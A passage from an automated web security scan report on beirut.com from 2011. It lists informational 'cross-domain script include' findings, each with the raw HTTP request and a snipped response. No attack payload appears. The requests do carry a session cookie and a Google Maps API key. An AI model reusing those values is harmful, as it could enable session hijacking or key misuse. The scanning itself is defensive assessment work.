<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.691. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Shopping-Centers/492064852/Shopping-Malls/10 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.692. http://www.beirut.com/Shopping/Specialized-Stores/2572668008 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Specialized-Stores/2572668008

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Specialized-Stores/2572668008 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:49:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.693. http://www.beirut.com/Shopping/Stores-Markets/3546182765 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Stores-Markets/3546182765 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:11:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.694. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Department-Store/68 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765/Department-Store/68

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Stores-Markets/3546182765/Department-Store/68 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:02:43 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.695. http://www.beirut.com/Shopping/Stores-Markets/3546182765/MiniMarket/75 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765/MiniMarket/75

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Stores-Markets/3546182765/MiniMarket/75 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:03:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.696. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765/Supermarket/63

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Stores-Markets/3546182765/Supermarket/63 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:58:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.697. http://www.beirut.com/Shopping/Toys-Gifts-Electronics/849778728 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Toys-Gifts-Electronics/849778728

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Toys-Gifts-Electronics/849778728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:24:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.698. http://www.beirut.com/Shopping/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:13:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.699. http://www.beirut.com/Shopping/Toys-Gifts-Electronics/849778728/Toys-Gifts-Gadgets/22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Toys-Gifts-Electronics/849778728/Toys-Gifts-Gadgets/22

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Toys-Gifts-Electronics/849778728/Toys-Gifts-Gadgets/22 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:18:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.700. http://www.beirut.com/Theaters/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Theaters/1

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Theaters/1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:25:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.701. http://www.beirut.com/ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:08:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.702. http://www.beirut.com/ThingsToDo/Clemenceau/Fluks/5938 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Clemenceau/Fluks/5938

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Clemenceau/Fluks/5938 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:11:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
